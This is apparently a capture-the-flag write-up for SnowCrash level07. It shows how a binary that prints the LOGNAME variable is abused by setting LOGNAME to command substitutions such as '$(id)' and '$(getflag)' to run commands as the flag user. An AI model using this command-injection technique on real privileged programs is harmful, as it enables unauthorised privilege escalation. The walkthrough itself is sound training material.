Introduction
In level 07, we exploit a binary file (level07) that prints the LOGNAME environment variable. By injecting commands into the LOGNAME variable, we execute arbitrary commands to obtain the flag.
Steps:
Exploring the Binary:
We execute the binary filelevel07to understand its behavior:1
2level07@SnowCrash:~$ ./level07
level07The program simply prints the LOGNAME variable.
Identifying Command Injection:
We discover that the program evaluates the LOGNAME variable, allowing for command injection. We export the LOGNAME variable with a command to execute:1
2level07@SnowCrash:~$ LOGNAME="\$(id)"; ./level07
uid=3007(flag07) gid=2007(level07) groups=3007(flag07),100(users),2007(level07)The command id is executed, revealing the userโs identity.
Exploiting Command Injection:
We exploit the command injection to execute the getflag command:1
2level07@SnowCrash:~$ LOGNAME="\$(getflag)"; ./level07
Check flag. Here is your token : ***************************************The
getflagcommand is executed, and we obtain the flag.
Conclusion
By exploiting the command injection vulnerability in the level07 binary, we successfully executed arbitrary commands and obtained the flag for level 07.